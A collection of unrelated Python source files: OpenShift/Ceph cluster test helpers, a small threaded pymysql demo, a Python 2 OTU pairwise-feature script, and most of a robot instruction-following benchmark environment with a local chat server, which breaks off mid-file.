# Skip collecting performance_stats for external mode RHCS cluster
logging.info("Skipping status collection for external mode")
else:
ceph_obj = CephCluster()
# Get iops and throughput percentage of cluster
iops_percentage = ceph_obj.get_iops_percentage()
throughput_percentage = ceph_obj.get_throughput_percentage()
performance_stats['iops_percentage'] = iops_percentage
performance_stats['throughput_percentage'] = throughput_percentage
# ToDo: Get iops and throughput percentage of each nodes
# Get the cpu and memory of each nodes from adm top
master_node_utilization_from_adm_top = \
node.get_node_resource_utilization_from_adm_top(node_type='master')
worker_node_utilization_from_adm_top = \
node.get_node_resource_utilization_from_adm_top(node_type='worker')
# Get the cpu and memory from describe of nodes
master_node_utilization_from_oc_describe = \
node.get_node_resource_utilization_from_oc_describe(node_type='master')
worker_node_utilization_from_oc_describe = \
node.get_node_resource_utilization_from_oc_describe(node_type='worker')
performance_stats['master_node_utilization'] = master_node_utilization_from_adm_top
performance_stats['worker_node_utilization'] = worker_node_utilization_from_adm_top
performance_stats['master_node_utilization_from_oc_describe'] = master_node_utilization_from_oc_describe
performance_stats['worker_node_utilization_from_oc_describe'] = worker_node_utilization_from_oc_describe
file_name = os.path.join(log_dir_path, 'performance')
with open(file_name, 'w') as outfile:
json.dump(performance_stats, outfile)
def validate_pod_oomkilled(
pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE, container=None
):
"""
Validate pod oomkilled message are found on log
Args:
pod_name (str): Name of the pod
namespace (str): Namespace of the pod
container (str): Name of the container
Returns:
bool : True if oomkill messages are not found on log.
False Otherwise.
Raises:
Assertion if failed to fetch logs
"""
rc = True
try:
pod_log = pod.get_pod_logs(
pod_name=pod_name, namespace=namespace,
container=container, previous=True
)
result = pod_log.find("signal: killed")
if result != -1:
rc = False
except CommandFailed as ecf:
assert f'previous terminated container "{container}" in pod "{pod_name}" not found' in str(ecf), (
"Failed to fetch logs"
)
return rc
def validate_pods_are_running_and_not_restarted(
pod_name, pod_restart_count, namespace
):
"""
Validate given pod is in running state and not restarted or re-spinned
Args:
pod_name (str): Name of the pod
pod_restart_count (int): Restart count of pod
namespace (str): Namespace of the pod
Returns:
bool : True if pod is in running state and restart
count matches the previous one
"""
ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
pod_obj = ocp_obj.get(resource_name=pod_name)
restart_count = pod_obj.get('status').get('containerStatuses')[0].get('restartCount')
pod_state = pod_obj.get('status').get('phase')
if pod_state == 'Running' and restart_count == pod_restart_count:
logger.info("Pod is running state and restart count matches with previous one")
return True
logger.error(f"Pod is in {pod_state} state and restart count of pod {restart_count}")
logger.info(f"{pod_obj}")
return False
def calc_local_file_md5_sum(path):
"""
Calculate and return the MD5 checksum of a local file
Arguments:
path(str): The path to the file
Returns:
str: The MD5 checksum
"""
with open(path, 'rb') as file_to_hash:
file_as_bytes = file_to_hash.read()
return hashlib.md5(file_as_bytes).hexdigest()
def retrieve_default_ingress_crt():
"""
Copy the default ingress certificate from the router-ca secret
to the local code runner for usage with boto3.
"""
default_ingress_crt_b64 = OCP(
kind='secret',
namespace='openshift-ingress-operator',
resource_name='router-ca'
).get().get('data').get('tls.crt')
decoded_crt = base64.b64decode(default_ingress_crt_b64).decode('utf-8')
with open(constants.DEFAULT_INGRESS_CRT_LOCAL_PATH, 'w') as crtfile:
crtfile.write(decoded_crt)
def storagecluster_independent_check():
"""
Check whether the storagecluster is running in independent mode
by checking the value of spec.externalStorage.enable
Returns:
bool: True if storagecluster is running on external mode False otherwise
"""
storage_cluster = OCP(
kind='StorageCluster',
namespace=config.ENV_DATA['cluster_namespace']
).get().get('items')[0]
return bool(
storage_cluster.get('spec', {}).get(
'externalStorage', {}
).get('enable', False)
)
def get_pv_size(storageclass=None):
"""
Get Pv size from requested storageclass
Args:
storageclass (str): Name of storageclass
Returns:
list: list of pv's size
"""
return_list = []
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()['items']
for pv_obj in pv_objs:
if pv_obj['spec']['storageClassName'] == storageclass:
return_list.append(pv_obj['spec']['capacity']['storage'])
return return_list
def get_cluster_proxies():
"""
Get http and https proxy configuration.
* If configuration ENV_DATA['http_proxy'] (and prospectively
ENV_DATA['https_proxy']) exists, return the respective values.
(If https_proxy not defined, use value from http_proxy.)
* If configuration ENV_DATA['http_proxy'] doesn't exist, try to gather
cluster wide proxy configuration.
* If no proxy configuration found, return empty string for all http_proxy,
https_proxy and no_proxy.
Returns:
tuple: (http_proxy, https_proxy, no_proxy)
"""
if 'http_proxy' in config.ENV_DATA:
http_proxy = config.ENV_DATA['http_proxy']
https_proxy = config.ENV_DATA.get(
'https_proxy', config.ENV_DATA['http_proxy']
)
no_proxy = config.ENV_DATA.get('no_proxy', '')
else:
ocp_obj = ocp.OCP(kind=constants.PROXY, resource_name='cluster')
proxy_obj = ocp_obj.get()
http_proxy = proxy_obj.get('spec', {}).get('httpProxy', '')
https_proxy = proxy_obj.get('spec', {}).get('httpsProxy', '')
no_proxy = proxy_obj.get('status', {}).get('noProxy', '')
logger.info("Using http_proxy: '%s'", http_proxy)
logger.info("Using https_proxy: '%s'", https_proxy)
logger.info("Using no_proxy: '%s'", no_proxy)
return http_proxy, https_proxy, no_proxy
def default_volumesnapshotclass(interface_type):
"""
Return default VolumeSnapshotClass based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: VolumeSnapshotClass Instance
"""
if interface_type == constants.CEPHBLOCKPOOL:
resource_name = constants.DEFAULT_VOLUMESNAPSHOTCLASS_RBD
elif interface_type == constants.CEPHFILESYSTEM:
resource_name = constants.DEFAULT_VOLUMESNAPSHOTCLASS_CEPHFS
base_snapshot_class = OCP(
kind=constants.VOLUMESNAPSHOTCLASS,
resource_name=resource_name
)
return OCS(**base_snapshot_class.data)
|
mysql.py
|
#导入pymysql的包
import pymysql
import threading
def demo(conn):
try:
cur=conn.cursor()#获取一个游标
cur.execute('select id from 10 ORDER BY RAND() LIMIT 1000')
data=cur.fetchall()
print(len(data))
# cur.close()#关闭游标
# conn.close()#释放数据库资源
except Exception :print("查询失败")
def get_connect(self):
"""
获取连接信息
返回: conn.cursor()
"""
# if not self.db:
# raise(NameError,"没有设置数据库信息")
self.conn = pymysql.connect(host='10',user='10',passwd='10.com',db='10',port=10,charset='utf8mb4')
cur = self.conn.cursor()
if not cur:
raise (NameError, "连接数据库失败")
else:
return cur
def loop():
threads = []
threads_num = 5 # 线程数量
con1=get_connect()
con2=get_connect()
con3=get_connect()
con4=get_connect()
con5=get_connect()
t1 = threading.Thread(target=demo, args=(con1))
threads.append(t1)
t2 = threading.Thread(target=demo, args=(con2))
threads.append(t2)
t3 = threading.Thread(target=demo, args=(con3))
threads.append(t3)
t4 = threading.Thread(target=demo, args=(con4))
threads.append(t4)
t5 = threading.Thread(target=demo, args=(con5))
threads.append(t5)
if __name__ == '__main__':
loop()
|
otu_table_pairwise.py
|
import numpy as np
import util as utl
import threading
import time
def otu_pairwise(path, datakind):
dataset = path
rootdir = '/media/banua/Data/Kuliah/Destiny/Tesis/Program/csipb-jamu-prj.20160613.fixed/similarity-func/data/'
data = np.loadtxt(rootdir+dataset, delimiter=",")
data = data[:, 1:]
otu_tuple = ()
for i in range(0, len(data)):
for j in range(i+1, len(data)):
x1 = data[i, :]
x2 = data[j, :]
a = utl.getFeatureA(x1,x2); b = utl.getFeatureB(x1,x2)
c = utl.getFeatureC(x1,x2); d = utl.getFeatureD(x1,x2)
otu_tuple += ( (a, b, c, d) ),
print 'pasangan {} dan {}'.format(i, j)
print len(data)
otu_tuple = np.asarray(otu_tuple)
np.savetxt(datakind+'-otu.csv', otu_tuple, delimiter="\t", fmt="%s")
try:
(threading.Thread(target=otu_pairwise, args=('jamu/jamu_clean.csv', 'jamu'))).start()
(threading.Thread(target=otu_pairwise, args=('stahl-maccs/stahl-maccs.csv', 'maccs'))).start()
(threading.Thread(target=otu_pairwise, args=('zoo/zoo.csv', 'zoo'))).start()
except:
print "Error: unable to start thread"
|
benchmark_2d.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark environment for the Instruction Following/2D benchmark."""
import collections
import enum
import math
import os
import queue
import signal
import socket
import sys
import tempfile
import threading
import time
from typing import Any, Dict, List, Optional, Tuple, cast, TYPE_CHECKING
from typing import Callable
from absl import app # type: ignore
from absl import flags # type: ignore
import gym # type: ignore
import gym.core # type: ignore
from gym.utils import seeding # type: ignore
import numpy as np # type: ignore
from google.protobuf import timestamp_pb2
from pyreach.common.proto_gen import logs_pb2
from pyreach.core import Pose
from pyreach.gyms import core
from pyreach.gyms import reach_env
from pyreach.gyms.arm_element import ReachArmCommand
from pyreach.gyms.task_element import ReachAction as ReachTaskAction
# The type of the return from step.
StepReturn = Tuple[core.Observation, float, bool, Any]
# The benchmark environment ID. This corresponds to the id in
# gyms/__init__.py.
ENV_ID = "benchmark-2d-v1"
# The official 2d benchmark task code.
TASK_CODE_2D = "128"
# The number of bytes expected in each chat transaction. This is the maximum
# size of a short- or long-horizon instruction.
CHAT_LEN_BYTES = 256
# The file in the os temp dir containing the chat port number.
CHAT_PORT_FILE = "benchmark_2d_chat_port.txt"
# The orientation for the tool to point straight down.
TOOL_ORIENTATION_RADS = (1.27, -2.845, -0.054)
# The rough limits for the workspace. This is based on the end effector tip.
# It's a bit sloppy, because there may be some areas which can't be reached,
# especially close to the robot base and close to the far corners.
BOARD_X_LIMITS_METERS = (0.200, 0.610) # near, far w.r.t. base
BOARD_Y_LIMITS_METERS = (-0.297, 0.335) # right, left w.r.t. base
BOARD_Z_LIMITS_METERS = (0.1, 0.5)
# Safe z-height. This is above the blocks, so movement at this height will
# not impact against any blocks.
SAFE_Z_METERS = 0.262
# z-height where the end-effector can push the blocks around.
PUSH_Z_METERS = 0.184
# Maximum allowed linear distance (meters) between (i) desired cartesian pose,
# and (ii) measured cartesian pose.
SAFE_SERVO_DIST_METERS = 0.071
# Resting corner x,y coordinates (upper right with respect to a camera
# facing the base from the far side of the board, or near left with respect to
# the base) where the arm goes after a test case.
CORNER_X_METERS = 0.200
CORNER_Y_METERS = 0.335
# The number of seconds to complete a long-horizon instruction.
TIMEOUT_PER_TASK_SECONDS = 4 * 60.0
RESPONSE_DONE: int = 1
RESPONSE_FAILED: int = 2 # Done with error other than timeout
RESPONSE_ABORTED: int = 3
RESPONSE_REJECTED: int = 4
RESPONSE_TIMEOUT: int = 5 # Done with timeout error.
# The path to the file containing the instructions. The file is expected to have
# one string per line, the long-horizon text instruction to carry out. It must
# be no more than 256 bytes long when encoded as UTF-8.
INSTRUCTIONS_PATH: str = "benchmark_2d_long_horizon_instrs.txt"
# The maximum number of test cases to present.
NUM_TEST_CASES: int = 3
# Required for mypy to pass typechecking.
if TYPE_CHECKING:
SimpleQueue = queue.SimpleQueue
else:
class FakeGenericMeta(type):
def __getitem__(cls, item):
return cls
class SimpleQueue(queue.Queue, metaclass=FakeGenericMeta):
pass
class Instruction:
"""Represents a single long-horizon instruction to test the agent against."""
def __init__(self, instruction: str):
self.instruction = instruction
class SetupState(enum.Enum):
"""The state of the environment."""
# The environment needs the human to reset the environment.
AWAIT_CLIENT = enum.auto()
# The agent is attempting to follow the instruction.
ATTEMPTING_INSTRUCTION = enum.auto()
class TextInstruction:
"""Text instruction class for holding text instruction data.
Attributes:
name: The name of the corresponding device.
ts: The timestamp when the instruction was created.
instr: The UTF-8 encoded text instruction.
"""
name: str
ts: float
instr: np.ndarray
_lock: threading.Lock
def __init__(self, name: str):
assert name, "TextInstruction name cannot be empty"
self.name = name
self.ts = 0
self.instr = self._str_to_nparray("")
self._lock = threading.Lock()
def set(self, instr: str) -> None:
"""Sets this instruction's data.
Thread-safe.
Args:
instr: The instruction to set.
"""
self._lock.acquire()
self.ts = time.time()
self.instr = self._str_to_nparray(instr)
self._lock.release()
def inject(self, obs: core.Observation) -> None:
"""Injects this instruction into the observation.
Thread safe.
Args:
obs: The observation to inject the instruction into.
"""
obs = cast(Dict[str, Any], obs)
self._lock.acquire()
obs[self.name] = {
"ts": self.ts,
"instruction": self.instr,
}
self._lock.release()
def _str_to_nparray(self, s: str) -> np.ndarray:
"""Encodes the string as UTF-8, returning the data as an ndarray.
If the string encodes to more than CHAT_LEN_BYTES, the array is
truncated to CHAT_LEN_BYTES.
Args:
s: The string to encode.
Returns:
The UTF-8 encoded string in an np.ndarray of floats.
"""
bs = s.encode("utf-8")[:CHAT_LEN_BYTES]
buff = bytearray([0] * CHAT_LEN_BYTES)
buff[:len(bs)] = bs
return np.array(list(buff), dtype=np.float)
class ChatServer:
"""Sets up a socket at a random port to receive chat messages.
The port number chosen is stored in /{TMPDIR}/{CHAT_PORT_FILE}.
Upon initial connection, it will send the long-horizon text instruction over
to the connecting client. Then it will wait for CHAT_LEN_BYTES length
messages and notify the environment for each message. When the client closes
the connection, we assume the task is done.
"""
instruction: str
server: socket.socket
sock: socket.socket
thread: threading.Thread
chatport: int
def __init__(self, instruction: str,
notify: Callable[[bytearray], None]):
self.instruction = instruction
self.notify = notify
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind((socket.gethostname(), 0))
self.chatport = self.server.getsockname()[1]
with open(f"{tempfile.gettempdir()}/{CHAT_PORT_FILE}", "w") as f:
f.write(f"{self.chatport}")
self.server.listen(1)
print(f"{time.time()}: Waiting for chat client to connect")
(self.sock, _) = self.server.accept()
self.thread = threading.Thread(target=self.go)
self.thread.start()
def go(self) -> None:
"""Handles the connection.
First sends the long-horizon text instruction. Then awaits low-level text
instructions, until the client closes the connection.
"""
bs = self.instruction.encode("utf-8")[:CHAT_LEN_BYTES]
buff = bytearray([0] * CHAT_LEN_BYTES)
buff[:len(bs)] = bs
total = 0
while total < CHAT_LEN_BYTES:
sent = self.sock.send(buff[total:])
if sent == 0:
print("")
print(f"{time.time()}: Chat client closed connection.")
return
total = total + sent
while True:
data = bytearray()
while len(data) < CHAT_LEN_BYTES:
chunk = self.sock.recv(CHAT_LEN_BYTES - len(data))
if not chunk:
print("")
print(f"{time.time()}: Chat client closed connection.")
self.stop()
return
data.extend(chunk)
self.notify(data)
def stop(self) -> None:
"""Stops the server."""
print("Stopping chat server...")
fname = f"{tempfile.gettempdir()}/{CHAT_PORT_FILE}"
try:
os.remove(fname)
except FileNotFoundError:
pass
try:
self.sock.shutdown(socket.SHUT_RD)
except OSError:
pass # This is okay.
self.sock.close()
try:
self.server.shutdown(socket.SHUT_RD)
except OSError:
pass # This is okay.
self.server.close()
def is_alive(self) -> bool:
return self.thread.is_alive()
class ChatClient:
"""Connects to the server to send low-level text instructions.
Upon connection, waits for the long-horizon text instruction from the server.
Then waits for input, and sends each message as a CHAT_LEN_BYTES-length
low-level text instruction to the server.
If the user ctrl-C's out of the input, we send that ctrl-C to the server
as an indication that the user claims the long-horizon instruction is done.
If the server disconnects, we either ran out of time or the agent claims
the long-horizon instruction is done.
This happens as many as NUM_TEST_CASES times.
"""
client: socket.socket
def __init__(self) -> None:
for _ in range(NUM_TEST_CASES):
print("-------------------- RESET --------------------------------")
print("1. E-stop the robot.")
print("2. Roughly bunch all the blocks in the center.")
print("3. Separate them all a bit.")
print("4. Release the e-stop.")
print("5. Hit return.")
_ = input("> ")
if not self.connect():
print("The agent never became ready. Probably a bug.")
return
if not self.await_instruction():
return
thread = threading.Thread(target=self.await_server_termination)
thread.start()
while self.getline():
pass
while thread.is_alive():
try:
time.sleep(1)
except KeyboardInterrupt:
pass # This is expected if client hits ctrl-C.
time.sleep(1) # Enough time for the server to delete its port file.
print("No more test cases.")
def connect(self) -> bool:
"""Gets the port number from the server's port file."""
port = -1
for _ in range(30):
try:
fname = f"{tempfile.gettempdir()}/{CHAT_PORT_FILE}"
with open(fname, "r") as f:
port = int(f.readline())
except FileNotFoundError:
print("The agent is not ready (no port file)... sleeping 1 second")
time.sleep(1)
continue
if port == -1:
print("The agent never became ready. Probably a bug.")
return False
print(f"Connecting to port {port}")
try:
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect((socket.gethostname(), port))
break
except ConnectionRefusedError:
print("The agent is not ready: connection refused... sleeping 1 second")
time.sleep(1)
continue
print("Connected to agent.")
return True
def await_server_termination(self) -> None:
"""Blocks until server terminates."""
_ = self.client.recv(CHAT_LEN_BYTES)
os.kill(os.getpid(), signal.SIGINT)
print("")
print("Server closed connection. Please wait for agent cleanup.")
def getline(self) -> bool:
"""Gets a short-horizon instruction from the user."""
buff = bytearray([0] * CHAT_LEN_BYTES)
line = "\u0003" # ctrl-C
try:
line = input("> ")
except KeyboardInterrupt:
print("Completion indicated!")
pass
bs = line.encode("utf-8")[:CHAT_LEN_BYTES]
buff[:len(bs)] = bs
total = 0
while total < CHAT_LEN_BYTES:
sent = self.client.send(buff[total:])
if sent == 0:
print("")
print("Completion or time limit indicated by "
"agent (server closed connection).")
return False
total = total + sent
if line == "\u0003":
print("Completion indication sent to agent. "
"Please wait for agent cleanup.")
return False
return True
def await_instruction(self) -> bool:
"""Waits for a long-horizon instruction from the server."""
data = bytearray()
while len(data) < CHAT_LEN_BYTES:
chunk = self.client.recv(CHAT_LEN_BYTES - len(data))
if not chunk:
print("")
print("Server closed connection.")
return False
data.extend(chunk)
print("------------------ INSTRUCTION -----------------------------")
print("")
print("Give the robot instructions to help it complete the following")
print("task. End each instruction with a return. If you see that the robot")
print("completed the entire task, hit ctrl-C to tell it that it finished.")
print("You've got four minutes from now!")
print("")
print(data.decode("utf-8", "ignore"))
print("")
print("------------------------------------------------------------")
return True
class Benchmark2DEnv(reach_env.ReachEnv):
"""Benchmark environment for the Instruction Following/2D benchmark.
See go/robotics-benchmark-2d and gym_api.md.
Briefly, the agent controls the robot, and a human (the "instructor")
gives the agent short-horizon instructions with the goal of completing
a long-horizon instruction. The agent is given the long-horizon
instruction also, but is not required to understand it or use it.
Procedure:
1. Run the gym; the gym connects to the evaluation cell. When the instructor
is ready, the instructor runs the chat client, which connects to the gym.
2. The 100 long-horizon instructions in the INSTRUCTIONS_PATH file are
shuffled by the gym.
* Each long-horizon instruction is no more than 256 bytes long when
encoded in UTF-8.
3. For each of the first three (shuffled) instructions:
a. The arm is moved up and out of the way of the board.
b. The gym tells the instructor to e-stop the robot, bunch all the blocks
together in the center, separate them a bit, and un-e-stop the robot.
c. When the instructor tells the gym this was done, the gym:
i. Sends a task start.
ii. Moves the arm down to an appropriate z-height to push the blocks.
iii. Gives the long-horizon instruction to the agent as an array of 256
floats. Each float is one byte of UTF-8 encoded text. Bytes beyond
the length of the encoded text are zero.
iv. Gives the long-horizon instruction to the instructor as text.
v. Starts a timer for four minutes.
vi. Sends an annotation for the beginning of the episode.
vii. Sends an annotation for the long-horizon instruction.
d. The instructor gives the gym short-horizon instructions which are passed
through to the agent verbatim.
* Each short-horizon instruction may be no more than 256 bytes long.
* Short-horizon instructions longer than 256 bytes are truncated to 256
bytes.
* Short-horizon instructions have no limit for their frequency of
submission.
* Short-horizon instructions are also sent in annotations.
e. The agent attempts to carry out the instructor's short-horizon
instructions.
f. The episode ends in any of these cases:
i. The instructor declares that the long-horizon instruction is done, by
hitting ctrl-C in the chat client.
ii. The agent declares that the long-horizon instruction is done, by
setting the "done" action to 1.
iii. The four-minute timer elapses.
g. The gym sends an annotation to mark the end of the episode.
h. The arm is moved up and out of the way of the board.
i. The gym sends a task end.
4. The gym disconnects from the robot.
From a logs perspective, the data is as follows:
* Gym connects to robot.
* Repeat 3 times:
* Robot arm moves out of the way.
* Task start (task code 128)
* Robot arm moves to ready position.
* Annotation: begin test case:
annotation.point_measurement.space = "benchmark-2d-v1",
annotation.point_measurement.name = "test_case_begin_ts",
annotation.point_measurement.value.seconds = timestamp
* Annotation: long-horizon instruction:
long_horizon_instruction.text = long-horizon instruction
* Robot arm moves, with short-horizon instruction annotations when
issued:
short_horizon_instruction.text = short-horizon instruction
* Annotation: end test case:
annotation.point_measurement.space = "benchmark-2d-v1",
annotation.point_measurement.name = "test_case_begin_ts",
annotation.point_measurement.value.seconds = time from
test_case_begin_ts
* Robot arm moves out of the way.
* Task end (task code 128)
* Gym disconnects from robot.
"""
def __init__(self, **kwargs: Any) -> None:
"""Initializes the environment.
Arguments:
**kwargs: Keyword arguments.
Keyword args accepted:
tc (str): The task code to override the standard task code with.
disable_time_limit (bool): Whether to disable the standard time limit.
"""
self._low_level_queue: SimpleQueue[str] = SimpleQueue()
self._timer_running: bool = False
self._deadline: float = 0.0
# The full list of long-horizon instructions.
self._long_horizon_instructions: List[Instruction] = self._load_test_cases()
# The random number generator for the environment.
self._np_random: np.random.RandomState = np.random.RandomState()
# The long-horizon instruction number to attempt
self._instr_num: int = 0
# The environment state.
self._setup_state: SetupState = SetupState.AWAIT_CLIENT
# The last observed server timestamp, for sending annotations.
self._last_server_ts: float = 0.0
# The last observed pose, for checking for unsafe actions.
self._last_pose: Optional[np.ndarray] = None
# The time at which the long-horizon instruction begins, defined as just
# before the arm drops to the pushing z-height before the long-horizon
# instruction is annotated. See _start_test_case() for details.
self._test_case_begin_ts: float = 0.0
# Memoized action space, with done space injected.
self._action_space: Optional[core.Space] = None
# Memoized observation space, with instruction spaces injected.
self._observation_space: Optional[core.Space] = None
# The text instruction data.
self._high_level_instruction = TextInstruction("long_horizon_instruction")
self._low_level_instruction = TextInstruction("short_horizon_instruction")
# The chat server.
self._chat_server: Optional[ChatServer] = None
# Whether the chat client sent a ctrl-C to indicate test case completed.
self._chat_client_indicated_end: bool = False
self._task_code = TASK_CODE_2D
if "tc" in kwargs:
self._task_code = str(kwargs["tc"])
self._disable_time_limit = False
if "disable_time_limit" in kwargs:
self._disable_time_limit = bool(kwargs["disable_time_limit"])
self.seed()
low_joint_angles = tuple([-6.283, -2.059, -3.926, -3.141, -1.692, -6.283])
high_joint_angles = tuple([6.283, 2.094, 0.191, 3.141, 3.141, 6.283])
task_params: Dict[str, str] = {"task-code": self._task_code}
pyreach_config: Dict[str, reach_env.ReachElement] = {
"arm":
reach_env.ReachArm("", low_joint_angles, high_joint_angles,
response_queue_length=1, is_synchronous=False),
"color_camera": # realsense
reach_env.ReachColorCamera("", shape=(360, 640),
initial_stream_request_period=0.03),
"server":
reach_env.ReachServer("Server"),
"task":
reach_env.ReachTask("Task"),
"annotation":
reach_env.ReachAnnotation("",
is_synchronous=False,
maximum_size=1024),
}
super().__init__(
pyreach_config=pyreach_config, task_params=task_params, **kwargs)
@property
def action_space(self) -> core.Space:
"""Returns the action space.
This memoizes the ReachEnv action space, adds the done space, and
hides the task space.
"""
if self._action_space is not None:
return self._action_space
a = super().action_space
a["done"] = gym.spaces.Discrete(2)
del a["task"]
self._action_space = a
return self._action_space
def _strip_action(self, action: core.Action) -> core.Action:
"""Removes the 'done' action for passing to the base step()."""
action = cast(Dict[str, Any], action)
a = action.copy()
if "done" in a:
del a["done"]
return a
@property
def observation_space(self) -> core.Space:
"""Returns the observation space.
This memoizes the ReachEnv observation space, and then adds the
text instruction spaces.
"""
if self._observation_space is not None:
return self._observation_space
s = super().observation_space
s[self._high_level_instruction.name] = gym.spaces.Dict({
"ts": gym.spaces.Box(low=0, high=sys.maxsize, shape=()),
"instruction": gym.spaces.MultiDiscrete(CHAT_LEN_BYTES * [255]),
})
s[self._low_level_instruction.name] = gym.spaces.Dict({
"ts": gym.spaces.Box(low=0, high=sys.maxsize, shape=()),
"instruction": gym.spaces.MultiDiscrete(CHAT_LEN_BYTES * [255]),
})
self._observation_space = s
return self._observation_space
def _update_observation(self, obs: core.Observation) -> None:
"""Injects the high- and low-level text instructions into the observation.
They are injected into the observation passed in.
Also records the last server timestamp for annotations, and the
last pose for checking unsafe moves.
Args:
obs: The observation to inject the instructions into.
"""
obs = cast(Dict[str, Any], obs)
self._high_level_instruction.inject(obs)
self._low_level_instruction.inject(obs)
self._last_server_ts = obs["server"]["latest_ts"]
self._last_pose = obs["arm"]["pose"]
def _load_test_cases(self) -> List[Instruction]:
"""Loads the long horizon instructions from this directory."""
test_cases = []
instr_dir = os.path.dirname(os.path.realpath(__file__))
path = os.path.join(instr_dir, INSTRUCTIONS_PATH)
with open(path) as f:
lines = f.readlines()
test_cases = [Instruction(instruction=line.strip()) for line in lines]
return test_cases
def seed(self, seed: Optional[int] = None) -> List[Any]:
"""Sets the seed for this env's random number generator(s).
Note:
Some environments use multiple pseudorandom number generators.
We want to capture all such seeds used in order to ensure that
there aren't accidental correlations between multiple generators.
Args:
seed: A seed to be passed to np_random. If None, a random seed is used.
Returns:
list<bigint>: Returns the list of seeds used in this env's random
number generators. The first value in the list should be the
"main" seed, or the value which a reproducer should pass to
'seed'. Often, the main seed equals the provided 'seed', but
this won't be true if seed=None, for example.
"""
self._np_random, seed = seeding.np_random(seed)
return [seed]
def reset(self) -> core.Observation:
"""Resets the benchmark.
Returns:
Initial observation.
"""
self._high_level_instruction.set("")
self._low_level_instruction.set("")
super().reset()
print(f"{time.time()}: Resetting environment.")
observation, reward, _, info = self._end_test_case(reward=0, reset=True)
# Shuffle the test cases.
self._np_random.shuffle(self._long_horizon_instructions)
self._setup_state = SetupState.AWAIT_CLIENT
self._instr_num = 0
print(f"{time.time()}: Reset complete.")
return (observation, reward, False, info)
def _super_step(self, action: core.Action) -> StepReturn:
"""Calls super step and injects instructions into returned observation."""
observation, reward, done, info = super().step(action)
self._update_observation(observation)
return (observation, reward, done, info)
def step(self, action: core.Action) -> StepReturn:
"""Perform one step.
The observation will be None to indicate that the agent should exit.
Args:
action: The action to perform.
Returns:
A StepReturn tuple.
"""
observation: core.Observation = None
reward: float = 0.0
instr_done: bool = False
info: Any = None
# This is just the action, without the done action in it, and with a
# don't-change-task action in it.
stripped_action: core.Action = self._strip_action(action)
stripped_action = cast(Dict[str, Any], stripped_action)
stripped_action["task"] = {}
stripped_action["task"]["action"] = ReachTaskAction.NO_CHANGE
if self._setup_state == SetupState.AWAIT_CLIENT:
return self._start_test_case(reward, info)
# Check for various termination criteria.
reward, instr_done = self._check_for_done(action)
# instr_done is only set when the agent runs out of time or the agent
# indicates done, or the human at the chat client indicates done.
if instr_done:
self._setup_state = SetupState.AWAIT_CLIENT
self._instr_num += 1
print(f"{time.time()}: "
"Task completion criteria reached; closing out task.")
return self._end_test_case(reward, reset=False)
# If there's a new low-level instruction, issue an annotation for it
# and include it in the observation.
self._process_low_level_instr()
# Check the agent's action for board bounds or huge moves. Give a
# negative reward for such a move.
if not self._is_safe_move(stripped_action):
observation, _, _, info = self._super_step({})
return (observation, -1, False, info)
# Finally, issue the agent's action.
observation, reward, _, info = self._super_step(stripped_action)
return (observation, reward, False, info)
def _is_safe_move(self, action: core.Action) -> bool:
"""Determines if a servo move is a safe move."""
action = cast(Dict[str, Any], action)
pose: Optional[Pose]
if self._last_pose is None:
return True
if "arm" not in action:
return True
if "command" not in action["arm"]:
return True
if "servo" not in action["arm"]:
return True
if action["arm"]["servo"] != 1:
return True
if action["arm"]["command"] == ReachArmCommand.POSE:
p = action["arm"]["pose"]
if isinstance(p, list):
pose = Pose.from_list(p)
elif isinstance(p, tuple):
p = cast(Tuple[float, float, float, float, float, float], p)
pose = Pose.from_tuple(p)
elif isinstance(p, np.ndarray):
p = cast(np.ndarray, p)
pose = Pose.from_list(p.tolist())
else:
print(f"Warning: Unknown type for arm/pose: {type(p)}, "
"treating as safe.")
return True
elif action["arm"]["command"] == ReachArmCommand.JOINTS:
pose = self.fk("", action["arm"]["joints"])
if pose is None:
print("Warning: FK returned None, treating move as safe.")
return True
tr = pose.position
distx = (tr.x - self._last_pose[0])
dist = distx * distx
disty = (tr.y - self._last_pose[1])
dist += disty * disty
distz = (tr.z - self._last_pose[2])
dist += distz * distz
dist = math.sqrt(dist)
if dist > SAFE_SERVO_DIST_METERS:
print("Unsafe move denied: servo move would be "
f"{dist} > {SAFE_SERVO_DIST_METERS}")
return False
fudge = 0.01
if (tr.x < BOARD_X_LIMITS_METERS[0] - fudge or
tr.x > BOARD_X_LIMITS_METERS[1] + fudge):
print("Unsafe move denied: X position {tr.x} exceeds board limits")
return False
if (tr.y < BOARD_Y_LIMITS_METERS[0] - fudge or
tr.y > BOARD_Y_LIMITS_METERS[1] + fudge):
print("Unsafe move denied: Y position {tr.y} exceeds board limits")
return False
if (tr.z < BOARD_Z_LIMITS_METERS[0] - fudge or
tr.z > BOARD_Z_LIMITS_METERS[1] + fudge):
print("Unsafe move denied: Z position {tr.z} exceeds board limits")
return False
return True
def _check_for_done(self, action: core.Action) -> Tuple[float, bool]:
"""Checks for various termination criteria."""
# Did the agent indicate it's done?
action = cast(Dict[str, Any], action)
if "done" in action and action["done"] == 1:
print(f"{time.time()}: Agent indicated completion.")
self._timer_running = False
return (1.0, True)
# Did we run out of time?
if not self._disable_time_limit and time.time() >= self._deadline:
print(f"{time.time()}: You ran out of time!")
self._timer_running = False
return (-1.0, True)
# Did the chat client disconnect? The server is not alive if the client
# disconnected.
if self._chat_server and not self._chat_server.is_alive():
print(f"{time.time()}: Chat client disconnected, indicating completion.")
self._timer_running = False
return (1.0, True)
# Did the chat client send a ctrl-C?
if self._chat_client_indicated_end:
self._chat_client_indicated_end = False
print(f"{time.time()}: Chat client sent ctrl-C, indicating completion.")
self._timer_running = False
return (1.0, True)
return (0, False)
def _notify_low_level_instr(self, data: bytearray) -> None:
"""Puts a received low-level instruction onto the queue."""
